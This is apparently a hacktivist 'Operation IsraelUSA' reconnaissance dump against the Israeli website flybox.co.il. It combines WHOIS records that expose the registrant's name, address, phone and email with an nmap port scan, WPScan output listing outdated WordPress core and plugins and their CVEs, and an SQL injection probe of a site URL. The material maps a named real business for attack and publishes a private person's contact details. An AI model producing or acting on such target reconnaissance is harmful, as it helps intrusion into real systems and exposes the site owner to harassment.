Anonymous Operation IsraelUSA JTSEC full recon #15

#######################################################################################################################################
Hostname 	www.flybox.co.il 	  	ISP 	Unknown
Continent 	Unknown 	  	Flag
US
Country 	United States 	  	Country Code 	US
Region 	Unknown 	  	Local time 	30 Dec 2017 21:45 CST
City 	Unknown 	  	Latitude 	37.751
IP Address (IPv6) 	2400:cb00:2048:1::681f:4aef 	  	Longitude 	-97.822
#######################################################################################################################################
[i] Scanning Site: https://flybox.co.il


B A S I C   I N F O
====================


[+] Site Title: Flybox - אטרקציה במרכז לכל המשפחה והחברים! מנהרת רוח הגיעה לישראל
[+] IP address: 104.31.74.239
[+] Web Server: cloudflare
[+] CMS: WordPress
[+] Cloudflare: Detected
[+] Robots File: Found

-------------[ contents ]----------------
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php

-----------[end of contents]-------------


W H O I S   L O O K U P
========================


% The data in the WHOIS database of the .il registry is provided
% by ISOC-IL for information purposes, and to assist persons in
% obtaining information about or related to a domain name
% registration record. ISOC-IL does not guarantee its accuracy.
% By submitting a WHOIS query, you agree that you will use this
% Data only for lawful purposes and that, under no circumstances
% will you use this Data to: (1) allow, enable, or otherwise
% support the transmission of mass unsolicited, commercial
% advertising or solicitations via e-mail (spam);
% or  (2) enable high volume, automated, electronic processes that
% apply to ISOC-IL (or its systems).
% ISOC-IL reserves the right to modify these terms at any time.
% By submitting this query, you agree to abide by this policy.

query:        flybox.co.il

reg-name:     flybox
domain:       flybox.co.il

descr:        Ofer Bar
descr:        Kibutz Hulda
descr:        Kibutz Hulda
descr:        11111
descr:        Israel
phone:        +972 54 3035371
fax-no:       +972 9 9574370
admin-c:      IS-OB5539-IL
tech-c:       IS-ID1078-IL
zone-c:       IS-ID1078-IL
nserver:      athena.ns.cloudflare.com
nserver:      vin.ns.cloudflare.com
validity:     04-09-2019
DNSSEC:       unsigned
status:       Transfer Locked
changed:      domain-registrar AT isoc.org.il 20130904 (Assigned)
changed:      domain-registrar AT isoc.org.il 20161012 (Changed)

person:       Ofer Bar
address:      Ofer Bar
address:      Kibutz Hulda
address:      Kibutz Hulda
address:      11111
address:      Israel
phone:        +972 54 3035371
fax-no:       +972 9 9574370
e-mail:       tsahye AT gmail.com
nic-hdl:      IS-OB5539-IL
changed:      domain-registrar AT isoc.org.il 20130904
changed:      Managing Registrar 20150805

person:       Interspace Domreg
address:      Interspace Ltd.
address:      P.O.Box 8723
address:      Netanya
address:      42505
address:      Israel
phone:        +972 73 2224444
fax-no:       +972 73 2224440
e-mail:       domreg AT interspace.net
nic-hdl:      IS-ID1078-IL
changed:      Managing Registrar 20070110
changed:      Managing Registrar 20070319
changed:      Managing Registrar 20070909
changed:      Managing Registrar 20090514
changed:      Managing Registrar 20110720
changed:      Managing Registrar 20110720
changed:      Managing Registrar 20110721
changed:      Managing Registrar 20111128
changed:      Managing Registrar 20111128
changed:      Managing Registrar 20130924
changed:      Managing Registrar 20130924
changed:      Managing Registrar 20130924
changed:      Managing Registrar 20130924
changed:      Managing Registrar 20130924
changed:      Managing Registrar 20170518
changed:      Managing Registrar 20170716

registrar name: InterSpace Ltd
registrar info: http://www.internic.co.il

% Rights to the data above are restricted by copyright.


G E O  I P  L O O K  U P
=========================

[i] IP Address: 104.31.74.239
[i] Country: US
[i] State: N/A
[i] City: N/A
[i] Latitude: 37.750999
[i] Longitude: -97.821999


H T T P   H E A D E R S
=======================


[i]  HTTP/1.1 301 Moved Permanently
[i]  Date: Sun, 31 Dec 2017 03:49:43 GMT
[i]  Content-Type: text/html; charset=UTF-8
[i]  Connection: close
[i]  Set-Cookie: __cfduid=d048dd8f728aacac5c57377105f435c341514692182; expires=Mon, 31-Dec-18 03:49:42 GMT; path=/; domain=.flybox.co.il; HttpOnly
[i]  X-Powered-By: PHP/7.0.13
[i]  Set-Cookie: PHPSESSID=n8skqve9rvv5lcm3rj6i9l9bk6; expires=Thu, 14-Sep-2023 11:45:31 GMT; Max-Age=180000000; path=/
[i]  Expires: Thu, 19 Nov 1981 08:52:00 GMT
[i]  Cache-Control: no-store, no-cache, must-revalidate
[i]  Pragma: no-cache
[i]  Set-Cookie: qtrans_front_language=he; expires=Mon, 31-Dec-2018 03:45:31 GMT; Max-Age=31536000; path=/
[i]  Location: https://www.flybox.co.il/
[i]  Server: cloudflare
[i]  CF-RAY: 3d5a453b3ea599e6-EWR
[i]  HTTP/1.1 200 OK
[i]  Date: Sun, 31 Dec 2017 03:49:44 GMT
[i]  Content-Type: text/html; charset=UTF-8
[i]  Connection: close
[i]  Set-Cookie: __cfduid=dfb1c034c6d2f841166e7b2bc0c56bd481514692183; expires=Mon, 31-Dec-18 03:49:43 GMT; path=/; domain=.flybox.co.il; HttpOnly
[i]  X-Powered-By: PHP/7.0.13
[i]  Set-Cookie: PHPSESSID=68gdntsnihgeglnt961kd9mjd3; expires=Thu, 14-Sep-2023 11:45:32 GMT; Max-Age=180000000; path=/
[i]  Expires: Thu, 19 Nov 1981 08:52:00 GMT
[i]  Cache-Control: no-store, no-cache, must-revalidate
[i]  Pragma: no-cache
[i]  Set-Cookie: qtrans_front_language=he; expires=Mon, 31-Dec-2018 03:45:32 GMT; Max-Age=31536000; path=/
[i]  Link: <https://www.flybox.co.il/wp-json/>; rel="https://api.w.org/"
[i]  Link: <https://www.flybox.co.il/>; rel=shortlink
[i]  Access-Control-Allow-Origin: *
[i]  Server: cloudflare
[i]  CF-RAY: 3d5a45419c650ef7-EWR


D N S   L O O K U P
===================

flybox.co.il.		3788	IN	HINFO	"ANY obsoleted" "See draft-ietf-dnsop-refuse-any"


S U B N E T   C A L C U L A T I O N
====================================

Address       = 2400:cb00:2048:1::681f:4aef
Network       = 2400:cb00:2048:1::681f:4aef / 128
Netmask       = ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Wildcard Mask = ::
Hosts Bits    = 0
Max. Hosts    = 0   (2^0 - 1)
Host Range    = { 2400:cb00:2048:1::681f:4af0 - 2400:cb00:2048:1::681f:4aef }


N M A P   P O R T   S C A N
============================


Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-31 03:49 UTC
Nmap scan report for flybox.co.il (104.31.75.239)
Host is up (0.0021s latency).
Other addresses for flybox.co.il (not scanned): 104.31.74.239 2400:cb00:2048:1::681f:4aef 2400:cb00:2048:1::681f:4bef
PORT     STATE    SERVICE       VERSION
21/tcp   filtered ftp
22/tcp   filtered ssh
23/tcp   filtered telnet
25/tcp   filtered smtp
80/tcp   open     http          Cloudflare nginx
110/tcp  filtered pop3
143/tcp  filtered imap
443/tcp  open     ssl/http      Cloudflare nginx
445/tcp  filtered microsoft-ds
3389/tcp filtered ms-wbt-server

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.96 seconds
[!] IP Address : 104.31.75.239
[-] Cloudflare detected
[!] Powered By: PHP/7.0.13
[-] Clickjacking protection is not in place.
[!] CMS Detected : WordPress
[?] Would you like to use WPScan? [Y/n] Y
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[i] The remote host tried to redirect to: https://www.flybox.co.il/
[?] Do you want follow the redirection ? [Y]es [N]o [A]bort, default: [N]Y
[+] URL: https://www.flybox.co.il/
[+] Started: Sat Dec 30 22:51:59 2017

[+] robots.txt available under: 'https://www.flybox.co.il/robots.txt'
[+] Interesting entry from robots.txt: https://www.flybox.co.il/wp-admin/admin-ajax.php
[!] The WordPress 'https://www.flybox.co.il/readme.html' file exists exposing a version number
[+] Interesting header: CF-RAY: 3d5a48eaac52473a-EWR
[+] Interesting header: LINK: <https://www.flybox.co.il/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: LINK: <https://www.flybox.co.il/>; rel=shortlink
[+] Interesting header: SERVER: cloudflare
[+] Interesting header: SET-COOKIE: qtrans_front_language=he; expires=Mon, 31-Dec-2018 03:48:01 GMT; Max-Age=31536000; path=/
[+] Interesting header: X-POWERED-BY: PHP/7.0.13
[+] XML-RPC Interface available under: https://www.flybox.co.il/xmlrpc.php

[+] WordPress version 4.5.6 (Released on 2017-01-26) identified from meta generator, links opml, stylesheets numbers
[!] 22 vulnerabilities identified from the version number

[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
    Reference: https://wpvulndb.com/vulnerabilities/8765
    Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
    Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
    Reference: http://seclists.org/oss-sec/2017/q1/563
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
[i] Fixed in: 4.5.7

[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
    Reference: https://wpvulndb.com/vulnerabilities/8766
    Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
[i] Fixed in: 4.5.7

[!] Title: WordPress  4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
    Reference: https://wpvulndb.com/vulnerabilities/8768
    Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
    Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
[i] Fixed in: 4.5.7

[!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
    Reference: https://wpvulndb.com/vulnerabilities/8770
    Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
    Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
    Reference: http://seclists.org/oss-sec/2017/q1/562
    Reference: https://hackerone.com/reports/153093
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
[i] Fixed in: 4.5.7

[!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
    Reference: https://wpvulndb.com/vulnerabilities/8807
    Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
    Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
    Reference: https://core.trac.wordpress.org/ticket/25239
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295

[!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
    Reference: https://wpvulndb.com/vulnerabilities/8815
    Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
    Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
[i] Fixed in: 4.5.9

[!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
    Reference: https://wpvulndb.com/vulnerabilities/8816
    Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
    Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
[i] Fixed in: 4.5.9

[!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
    Reference: https://wpvulndb.com/vulnerabilities/8817
    Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
    Reference: https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065
[i] Fixed in: 4.5.9

[!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
    Reference: https://wpvulndb.com/vulnerabilities/8818
    Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
    Reference: https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
    Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
[i] Fixed in: 4.5.9

[!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
    Reference: https://wpvulndb.com/vulnerabilities/8819
    Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
    Reference: https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
    Reference: https://hackerone.com/reports/203515
    Reference: https://hackerone.com/reports/203515
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061
[i] Fixed in: 4.5.9

[!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
    Reference: https://wpvulndb.com/vulnerabilities/8820
    Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
    Reference: https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063
[i] Fixed in: 4.5.9

[!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8905
    Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
    Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
[i] Fixed in: 4.5.10

[!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
    Reference: https://wpvulndb.com/vulnerabilities/8906
    Reference: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
    Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
    Reference: https://wpvulndb.com/vulnerabilities/8905
[i] Fixed in: 4.7.5

[!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
    Reference: https://wpvulndb.com/vulnerabilities/8910
    Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/changeset/41398
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
[i] Fixed in: 4.5.10

[!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
    Reference: https://wpvulndb.com/vulnerabilities/8911
    Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/changeset/41457
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
[i] Fixed in: 4.5.10

[!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
    Reference: https://wpvulndb.com/vulnerabilities/8913
    Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/changeset/41448
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
[i] Fixed in: 4.5.10

[!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
    Reference: https://wpvulndb.com/vulnerabilities/8914
    Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/changeset/41395
    Reference: https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
[i] Fixed in: 4.5.10

[!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
    Reference: https://wpvulndb.com/vulnerabilities/8941
    Reference: https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
    Reference: https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
    Reference: https://twitter.com/ircmaxell/status/923662170092638208
    Reference: https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
[i] Fixed in: 4.5.11

[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
    Reference: https://wpvulndb.com/vulnerabilities/8966
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
[i] Fixed in: 4.5.12

[!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
    Reference: https://wpvulndb.com/vulnerabilities/8967
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
[i] Fixed in: 4.5.12

[!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
    Reference: https://wpvulndb.com/vulnerabilities/8968
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
[i] Fixed in: 4.5.12

[!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
    Reference: https://wpvulndb.com/vulnerabilities/8969
    Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
[i] Fixed in: 4.5.12

[+] WordPress theme in use: blue-summit-wp-bootstrap - v1.0

[+] Name: blue-summit-wp-bootstrap - v1.0
 |  Location: https://www.flybox.co.il/wp-content/themes/blue-summit-wp-bootstrap/
 |  Style URL: https://www.flybox.co.il/wp-content/themes/blue-summit-wp-bootstrap/style.css
 |  Theme Name: Flybox
 |  Author: Flybox
 |  Author URI: http://www.flybox.co.il/

[+] Enumerating plugins from passive detection ...
 | 15 plugins found:

[+] Name: accordions - v2.0.8
 |  Last updated: 2017-11-26T04:13:00.000Z
 |  Location: https://www.flybox.co.il/wp-content/plugins/accordions/
 |  Readme: https://www.flybox.co.il/wp-content/plugins/accordions/readme.txt
[!] The version is out of date, the latest version is 2.0.21

[+] Name: colorbox - v1.0.0
 |  Last updated: 2016-12-15T12:02:00.000Z
 |  Location: https://www.flybox.co.il/wp-content/plugins/colorbox/
 |  Readme: https://www.flybox.co.il/wp-content/plugins/colorbox/readme.txt
[!] The version is out of date, the latest version is 1.0.5

[+] Name: front-end-only-users - v2.9.13
 |  Last updated: 2017-12-15T23:06:00.000Z
 |  Location: https://www.flybox.co.il/wp-content/plugins/front-end-only-users/
 |  Readme: https://www.flybox.co.il/wp-content/plugins/front-end-only-users/readme.txt
[!] The version is out of date, the latest version is 3.1.15

[+] Name: new-royalslider
 |  Location: https://www.flybox.co.il/wp-content/plugins/new-royalslider/

[+] Name: popup-builder - v2.3.1
 |  Last updated: 2017-12-27T14:41:00.000Z
 |  Location: https://www.flybox.co.il/wp-content/plugins/popup-builder/
 |  Readme: https://www.flybox.co.il/wp-content/plugins/popup-builder/readme.txt
[!] The version is out of date, the latest version is 2.6.7.1

[+] Name: popup-maker - v1.4.20
 |  Last updated: 2017-08-18T00:49:00.000Z
 |  Location: https://www.flybox.co.il/wp-content/plugins/popup-maker/
 |  Readme: https://www.flybox.co.il/wp-content/plugins/popup-maker/readme.txt
[!] The version is out of date, the latest version is 1.6.6

[!] Title: Popup Maker <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8878
    Reference: https://plugins.trac.wordpress.org/changeset/1697216/#file3
    Reference: https://jvn.jp/en/jp/JVN92921024/index.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2284
[i] Fixed in: 1.6.5

[+] Name: qtranslate-x - v3.4.6.8
 |  Latest version: 3.4.6.8 (up to date)
 |  Last updated: 2016-07-13T17:36:00.000Z
 |  Location: https://www.flybox.co.il/wp-content/plugins/qtranslate-x/
 |  Readme: https://www.flybox.co.il/wp-content/plugins/qtranslate-x/readme.txt

[+] Name: social-popup - v1.8
 |  Latest version: 1.6.4.5 (up to date)
 |  Last updated: 2015-05-20T17:06:00.000Z
 |  Location: https://www.flybox.co.il/wp-content/plugins/social-popup/
 |  Readme: https://www.flybox.co.il/wp-content/plugins/social-popup/README.txt

[+] Name: sogo-accessibility - v1.0.9
 |  Last updated: 2017-11-09T06:07:00.000Z
 |  Location: https://www.flybox.co.il/wp-content/plugins/sogo-accessibility/
 |  Readme: https://www.flybox.co.il/wp-content/plugins/sogo-accessibility/README.txt
[!] The version is out of date, the latest version is 1.2.2

[+] Name: superfly-menu
 |  Location: https://www.flybox.co.il/wp-content/plugins/superfly-menu/

[+] Name: woocommerce - v2.5.5
 |  Last updated: 2017-12-13T16:24:00.000Z
 |  Location: https://www.flybox.co.il/wp-content/plugins/woocommerce/
 |  Readme: https://www.flybox.co.il/wp-content/plugins/woocommerce/readme.txt
[!] The version is out of date, the latest version is 3.2.6

[!] Title: WooCommerce <= 2.6.2 - Authenticated Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8563
    Reference: https://woocommerce.wordpress.com/2016/07/19/woocommerce-2-6-3-fixsecurity-release-notes/
    Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_woocommerce_using_image_metadata__exif_.html
[i] Fixed in: 2.6.3

[!] Title: WooCommerce <= 2.6.3 - Stored Cross Site Scripting (XSS) via REST API
    Reference: https://wpvulndb.com/vulnerabilities/8619
    Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_woocommerce_wordpress_plugin.html
    Reference: http://seclists.org/fulldisclosure/2016/Sep/20
    Reference: https://hackerone.com/reports/152692
[i] Fixed in: 2.6.4

[!] Title: WooCommerce <= 2.6.8 - Authenticated Tax-Rate CSV XSS
    Reference: https://wpvulndb.com/vulnerabilities/8710
    Reference: https://www.fortiguard.com/advisory/fortinet-discovers-wordpress-woocommerce-plug-in-cross-site-scripting-vulnerability-1
    Reference: http://blog.fortinet.com/2016/12/16/woocommerce-tax-rates-cross-site-scripting-vulnerability2
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10112
[i] Fixed in: 2.6.9

[+] Name: woocommerce-ajax-add-to-cart-for-variable-products - v1.2.8
 |  Last updated: 2016-07-18T20:56:00.000Z
 |  Location: https://www.flybox.co.il/wp-content/plugins/woocommerce-ajax-add-to-cart-for-variable-products/
 |  Readme: https://www.flybox.co.il/wp-content/plugins/woocommerce-ajax-add-to-cart-for-variable-products/readme.txt
[!] The version is out of date, the latest version is 1.2.9

[+] Name: woocommerce-bookings
 |  Location: https://www.flybox.co.il/wp-content/plugins/woocommerce-bookings/
 |  Changelog: https://www.flybox.co.il/wp-content/plugins/woocommerce-bookings/changelog.txt

[+] Name: wp-facebook-login - v1.1.2
 |  Last updated: 2017-12-21T21:28:00.000Z
 |  Location: https://www.flybox.co.il/wp-content/plugins/wp-facebook-login/
 |  Readme: https://www.flybox.co.il/wp-content/plugins/wp-facebook-login/README.txt
[!] The version is out of date, the latest version is 1.2.2

[+] Name: wordpress-seo - v3.2.5
 |  Last updated: 2017-12-20T08:23:00.000Z
 |  Location: https://www.flybox.co.il/wp-content/plugins/wordpress-seo/
 |  Readme: https://www.flybox.co.il/wp-content/plugins/wordpress-seo/readme.txt
 |  Changelog: https://www.flybox.co.il/wp-content/plugins/wordpress-seo/changelog.txt
[!] The version is out of date, the latest version is 6.0

[!] Title: Yoast SEO <= 3.2.5 - Unspecified Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8569
    Reference: https://wordpress.org/plugins/wordpress-seo/changelog/
[i] Fixed in: 3.3.0

[!] Title: Yoast SEO <= 3.4.0 - Authenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8583
    Reference: https://plugins.trac.wordpress.org/changeset/1466243/wordpress-seo
[i] Fixed in: 3.4.1

[!] Title: Yoast SEO <= 5.7.1 - Unauthenticated Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8960
    Reference: https://plugins.trac.wordpress.org/changeset/1766831/wordpress-seo/trunk/admin/google_search_console/class-gsc-table.php
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16842
[i] Fixed in: 5.8

[+] Finished: Sat Dec 30 22:59:22 2017
[+] Requests Done: 432
[+] Memory used: 203.512 MB
[+] Elapsed time: 00:07:22
[+] Honeypot Probabilty: 30%
----------------------------------------
[+] Robots.txt retrieved
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php

----------------------------------------
PORT     STATE    SERVICE       VERSION
21/tcp   filtered ftp
22/tcp   filtered ssh
23/tcp   filtered telnet
25/tcp   filtered smtp
80/tcp   open     http          Cloudflare nginx
110/tcp  filtered pop3
143/tcp  filtered imap
443/tcp  open     ssl/https?
445/tcp  filtered microsoft-ds
3389/tcp filtered ms-wbt-server
----------------------------------------

[+] DNS Records

[+] Host Records (A)
www.flybox.co.ilHTTP: (104.31.75.239) AS13335 Cloudflare Inc

[+] TXT Records

[+] DNS Map: https://dnsdumpster.com/static/map/www.flybox.co.il.png

[>] Initiating 3 intel modules
[>] Loading Alpha module (1/3)
[>] Beta module deployed (2/3)
[>] Gamma module initiated (3/3)
No emails found

[+] Hosts found in search engines:
------------------------------------
[-] Resolving hostnames IPs...
[+] Virtual hosts:
-----------------
[>] Crawling the target for fuzzable URLs
[+] Found 4 fuzzable URLs
https://www.flybox.co.il///selected-package/?packageid=1
[>] Using SQLMap api to check for SQL injection vulnerabilities. Don't
    worry we are using an online service and it doesn't depend on your internet connection.
    This scan will take 2-3 minutes.
[-] None of parameters is vulnerable to SQL injection
[+] These are the URLs having parameters:
https://www.flybox.co.il///selected-package/?packageid=1
https://www.flybox.co.il///selected-package/?packageid=1
https://www.flybox.co.il///selected-package/?packageid=1
https://www.flybox.co.il///selected-package/?packageid=1
+] Target: https://www.flybox.co.il/
[+] Starting: 30/12/2017 22:55:35

[+] Server: cloudflare
[+] Uncommon header "Access-Control-Allow-Origin" found, with contents: *
[+] Uncommon header "CF-RAY" found, with contents: 3d5a4dde08fb0efd-EWR

[+] XML-RPC Interface available under: https://www.flybox.co.il/xmlrpc.php

[+] Found robots.txt file under: https://www.flybox.co.il/robots.txt
[+] Found wp-config.php file under: https://www.flybox.co.il/wp-config.php
[+] Found readme.html file under: https://www.flybox.co.il/readme.html

[+] wp-login not detect protection under: https://www.flybox.co.il/wp-login.php

[+] Robots available under: https://www.flybox.co.il/robots.txt
-------------------------
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php

-------------------------

[+] Running WordPress version: 4.5.6
 |  Release date: 2017-01-26
 |  Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
 |  Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
 |  Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
 |  Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
 |  Reference: http://seclists.org/oss-sec/2017/q1/563
 |  Fixed in: 4.5.7
 |  Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
 |  Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
 |  Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
 |  Fixed in: 4.5.7
 |  Title: WordPress  4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
 |  Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
 |  Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
 |  Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
 |  Fixed in: 4.5.7
 |  Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
 |  Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
